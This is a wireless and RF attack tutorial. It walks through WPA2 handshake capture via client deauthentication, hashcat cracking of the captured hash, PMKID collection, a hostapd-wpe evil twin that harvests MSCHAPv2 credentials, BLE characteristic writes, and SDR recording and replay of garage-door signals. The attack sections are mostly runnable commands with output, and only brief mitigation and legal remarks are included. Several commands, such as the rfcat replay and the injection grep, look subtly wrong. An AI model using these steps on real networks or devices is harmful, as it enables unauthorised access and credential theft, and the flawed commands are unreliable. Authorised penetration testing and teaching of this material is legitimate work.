Wireless Security Assessment and RF Analysis
802.11 Frame Structure and Encryption Evolution
Wireless networks operate using IEEE 802.11 frames that differ fundamentally from Ethernet. Management frames (beacons, probes, authentication, association) operate unencrypted and unauthenticated—a design flaw enabling numerous attacks. Data frames carry payload traffic, while control frames (ACK, RTS/CTS) coordinate medium access.
WEP (Wired Equivalent Privacy) relied on RC4 with a 24-bit initialization vector (IV), producing keystream reuse that led to practical statistical attacks. WPA/WPA2 introduced TKIP (now deprecated) and AES-CCMP, using a four-way handshake to derive session keys from the Pairwise Master Key (PMK). WPA3 replaces PSK authentication with Simultaneous Authentication of Equals (SAE), a password-authenticated key exchange resistant to offline dictionary attacks. SAE uses a commit-exchange protocol where both parties derive shared secrets without transmitting the password equivalent. Current practical attacks against WPA3-SAE remain limited to side-channel leaks in early implementations (Dragonblood vulnerabilities) and downgrade attacks where WPA3-Transition mode permits WPA2 connections.
Hardware Requirements: Adapter Chipsets and Driver Considerations
Successful wireless assessment demands compatible hardware. Monitor mode and frame injection require explicit driver support, often absent in consumer adapters.
| Chipset | Monitor Mode | Injection | Notes |
|---|---|---|---|
| RTL8187L (Realtek) | Yes | Yes | Legacy, stable, limited to 802.11g |
| AR9271 (Atheros) | Yes | Yes | Excellent Linux support via ath9k_htc |
| MT76xx (MediaTek) | Yes | Partial | Modern AC chips; monitor mode via mt76 driver |
| RTL88XXAU (Realtek) | Conditional | Conditional | Requires aircrack-ng/rtl8812au out-of-tree driver |
Verify capabilities before deployment:
# Check loaded driver and interface capabilities
iw list | grep -A 20 "Supported interface modes"
iw list | grep -A 10 "packet injection"
# Test injection with aireplay-ng
sudo aireplay-ng -9 wlan0mon
USB3 enclosures with external antenna connectors (Alfa AWUS036ACH with MT7612U, Alfa AWUS036NHA with AR9271) provide superior range and flexibility.
Aircrack-ng Suite: Capture and Analysis Workflow
The Aircrack-ng suite remains the foundational toolkit. A typical WPA2-PSK assessment proceeds through interface preparation, target identification, handshake capture, and offline cracking.
Enable monitor mode:
# Terminate interfering processes
sudo airmon-ng check kill
# Create monitor interface
sudo airmon-ng start wlan0
# Resulting interface typically wlan0mon
Discover targets and capture handshake:
# Channel-hop and list networks
sudo airodump-ng wlan0mon
# Lock to target channel, capture to file, deauthenticate clients
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# In separate terminal: force handshake renegotiation
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
The four-way handshake comprises message pairs (M1-M4) between authenticator and supplicant. M1 contains the Authenticator Nonce (ANonce); M2 contains the Supplicant Nonce (SNonce) and MIC; M3 confirms key installation; M4 completes negotiation. Only M1 and M2 (or M2 and M3) are required to derive the PMK and validate passphrase guesses. Airodump-ng indicates handshake capture with [ WPA handshake: AA:BB:CC:DD:EE:FF in the top-right display.
PMKID attack vector (no client required): The RSN IE (Robust Security Network Information Element) in EAPOL frames may contain a PMKID computed as PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA). Tools like hcxdumptool can request and capture this directly:
# Install hcxtools
sudo apt install hcxtools
# Passive or active PMKID collection
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
# Extract for hashcat
hcxpcapngtool -o hash.txt -E essidlist pmkid.pcapng
Complete Worked Example: WPA2-PSK Assessment to Cracked Passphrase
Step 1: Verify adapter and establish monitor mode
$ lsusb | grep -i wireless
Bus 001 Device 003: ID 0cf3:9271 Atheros Communications, Inc. AR9271 802.11n
$ sudo airmon-ng start wlan0
Interface wlan0mon was placed in monitor mode on channel 1
Step 2: Identify target network
$ sudo airodump-ng wlan0mon
BSSID PWR Beacons CH ENC CIPHER AUTH ESSID
AA:BB:CC:11:22:33 -42 1254 6 WPA2 CCMP PSK CorpNet-Guest
Step 3: Capture handshake with targeted deauthentication
# Terminal 1: focused capture
$ sudo airodump-ng -c 6 --bssid AA:BB:CC:11:22:33 -w corpnet_handshake wlan0mon
# Terminal 2: deauth burst (5 packets, 2 second spacing)
$ sudo aireplay-ng -0 5 -a AA:BB:CC:11:22:33 -c 00:11:22:33:44:55 wlan0mon
12:34:56 Waiting for beacon frame...
12:34:58 Sending 64 directed DeAuth...
12:35:01 Authentication from 00:11:22:33:44:55...
12:35:02 WPA handshake: AA:BB:CC:11:22:33 [Captured]
Step 4: Verify and convert capture
$ aircrack-ng corpnet_handshake-01.cap
Reading packets, please wait...
# BSSID ESSID Encryption
1 AA:BB:CC:11:22:33 CorpNet-Guest WPA (1 handshake)
$ hcxpcapngtool -o corpnet_hash.hc22000 corpnet_handshake-01.cap
Step 5: Hashcat dictionary attack with rules
# Benchmark RTX 3070: ~650 kH/s WPA2
$ hashcat -m 22000 corpnet_hash.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Realistic timing for 8-character password with complex rules: 4-72 hours
# For demonstration with known-weak password:
$ echo "Summer2024!" > candidate.txt
$ hashcat -m 22000 corpnet_hash.hc22000 candidate.txt
corpnet_hash.hc22000:Summer2024!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Time.Started.....: Thu Jan 15 14:32:01 2024 (0 secs)
Speed.#1.........: 63499 H/s
Recovered........: 1/1 (100.00%)
WPA-Enterprise Attacks: Evil Twin with Hostapd-WPE
WPA-Enterprise (802.1X) networks using PEAP or EAP-TTLS transmit credential material in tunneled TLS. The Hostapd-WPE (Wireless Pwnage Edition) patch creates a rogue RADIUS server and access point that harvests MSCHAPv2 challenge-response pairs.
# Configure hostapd-wpe for target SSID "Corp-802.1X"
cat > hostapd-wpe.conf << 'EOF'
interface=wlan0mon
driver=nl80211
ssid=Corp-802.1X
channel=1
ieee8021x=1
eapol_version=2
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=secret
EOF
sudo hostapd-wpe hostapd-wpe.conf
Clients connecting to the evil twin receive a self-signed certificate (ignored by most supplicants with weak validation). Hostapd-WPE logs the MSCHAPv2 challenge-response, crackable via asleap or john --format=netntlmv2 using a wordlist, or submitted to cloud cracking services for GPU-accelerated attacks. Certificate pinning and strict CA validation on client supplicants mitigate this vector.
Bluetooth and BLE Assessment
BlueZ provides the Linux Bluetooth stack. For Low Energy (BLE) reconnaissance and attacks, Bettercap offers integrated capabilities:
# BLE device discovery
sudo bettercap -eval "ble.recon on; ble.show"
# Enumerate services and characteristics
ble.enum AA:BB:CC:DD:EE:FF
# Read/write characteristics for fuzzing
ble.write AA:BB:CC:DD:EE:FF 0x0021 deadbeef
Bettercap's ble.recon module passively scans advertisement channels (37, 38, 39) detecting connectable and non-connectable broadcasts. Common BLE vulnerabilities include hardcoded credentials in characteristic values, missing pairing requirements, and replayable authentication tokens.
Software-Defined Radio for Broader RF Security
Beyond 802.11, the electromagnetic spectrum contains numerous unencrypted or weakly secured protocols. RTL-SDR dongles ($20-40, R820T2/Rafael Micro tuner) with GNU Radio enable reception from 24 MHz to 1.7 GHz.
| Target | Frequency | Common Protocol | Security Issues |
|---|---|---|---|
| Garage door openers | 300-433 MHz | Fixed code, rolling code | Replay attacks, de Bruijn sequences |
| Vehicle key fobs | 315/433/868 MHz | KeeLoq, HiTag2 | Rolljam attacks, cryptanalysis |
| Industrial telemetry | 900 MHz/2.4 GHz | WirelessHART, ISA100 | No encryption, spoofing |
| Pagers | 150 MHz | POCSAG | Unencrypted message broadcast |
Example: Capturing and replaying a fixed-code garage door signal:
# Record signal at 433.92 MHz
rtl_sdr -f 433920000 -s 2048000 -g 40 garage_door.raw
# Analyze in GNU Radio or replay directly
rtl_sdr -f 433920000 -s 2048000 -g 40 | \
rtl_fm -f 433920000 -s 200000 -g 40 - | \
sox -t raw -r 200000 -e signed -b 16 -c 1 - garage_door.wav
# Replay with transmit-capable SDR (HackRF, Yard Stick One)
rfcat -r -f 433920000 -m ASK_OOK -s garage_door.raw
Rolling-code implementations (KeeLoq, HCS301) require synchronized capture and immediate replay before the legitimate transmitter increments the counter. The Rolljam attack (Samy Kamkar) captures the signal, jams the receiver, and replays the captured code on demand while storing the subsequent code for future use.
SDR assessment demands regulatory awareness: transmission in licensed bands without authorization violates telecommunications regulations in most jurisdictions. Passive reception generally remains legal but verify local laws before deployment.